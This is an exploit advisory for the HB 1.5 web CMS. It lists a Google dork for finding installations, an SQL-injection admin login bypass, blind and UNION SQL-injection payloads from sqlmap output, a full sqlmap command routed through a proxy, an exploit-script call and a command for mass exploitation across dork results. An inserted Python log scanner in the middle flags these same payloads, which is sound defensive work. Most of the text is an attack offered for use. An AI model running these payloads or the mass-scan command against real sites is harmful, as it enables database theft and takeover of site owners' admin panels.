[ + ] FAILURE REPORTED:
15/May/2015
[ + ] Type:
ADMINISTRATIVE ACCESS PANEL
[ + ] Vendor:
http://www.hbwebecia.com.br/
[ + ] Version:
HB 1.5
[ + ] Google Dork:
inurl:"base.php?pagina"
[ + ] FILE VULN:
/admin/logar.php
[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar
[ + ] FILE VULN:
/base.php
[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)
[ + ] SQLMAP exploitation output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe
# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC
# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--
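Defender-side addition, not part of the original advisory: a small access-log scanner that flags requests against the two injection points named above (a non-numeric id on /base.php, and the boolean/time/UNION and `'=' 'or'` shapes from the payloads) so the pattern can be hunted for in web server logs. The log lines, IPs and timestamps are constructed for the example; the payload shapes are the ones the advisory lists.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache/nginx-style access-log lines (not real traffic). The first is a
# benign request; the rest carry the advisory's payloads, percent-encoded as a
# server would log them. Note: real POST form bodies are not in access logs; the
# logar.php line mirrors the advisory's query-string form of the bypass.
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2015:10:01:02 +0000] "GET /base.php?pagina=noticia&id=1 HTTP/1.1" 200 5120
10.0.0.9 - - [15/May/2015:10:01:07 +0000] "GET /base.php?pagina=noticia&id=114%27%20AND%201866%3D1866%20AND%20%27qvCe%27%3D%27qvCe HTTP/1.1" 200 5120
10.0.0.9 - - [15/May/2015:10:01:09 +0000] "GET /base.php?pagina=noticia&id=114%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29MPQc%29%20AND%20%27MJVC%27%3D%27MJVC HTTP/1.1" 200 5120
10.0.0.9 - - [15/May/2015:10:01:15 +0000] "GET /base.php?pagina=noticia&id=114%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a786b71%2C0x664a78565a7276576e76%2C0x71787a7871%29%2CNULL%2CNULL-- HTTP/1.1" 200 9000
10.0.0.9 - - [15/May/2015:10:02:00 +0000] "POST /admin/logar.php?login=%27%3D%27%20%27or%27&senha=%27%3D%27%20%27or%27&Submit3=Entrar HTTP/1.1" 302 0
"""

# Common log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Keyword shapes taken from the advisory: UNION query, SLEEP()-based blind,
# "AND n=n" boolean blind, and the '=' 'or' tautology used against logar.php.
SQLI_PATTERN = re.compile(
    r"union\s+(all\s+)?select|sleep\s*\(|\band\s+\d+\s*=\s*\d+|'\s*=\s*'\s*'or'", re.I
)

def classify_request(target):
    """Return the reasons a request target looks like SQLi against HB's sinks; [] if clean."""
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    reasons = []
    # base.php's id is an article number; anything non-numeric is out of contract.
    if parts.path == "/base.php" and "id" in params and not params["id"].isdigit():
        reasons.append("non-numeric id")
    for name, value in params.items():          # parse_qs has already percent-decoded
        if SQLI_PATTERN.search(value):
            reasons.append(f"sqli keyword in {name}")
    return reasons

def scan_log(text):
    """Yield (ip, method, path, reasons) for every log line that classify_request flags."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                             # malformed or non-request line
        reasons = classify_request(m["target"])
        if reasons:
            hits.append((m["ip"], m["method"], urlsplit(m["target"]).path, reasons))
    return hits

if __name__ == "__main__":
    for ip, method, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {path}: {', '.join(reasons)}")
```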
[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2 --proxy 'http://localhost:8118'
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only
--flush-session --batch
[ + ] EXECUTE:
php xpl.php -t http://target.us
[ + ] FILE_OUTPUT :
HB.txt
PRINT OUTPUT:
[ + ] Exploit:
http://www.exploit4arab.net/exploits/1505
[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
PRINT OUTPUT:
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR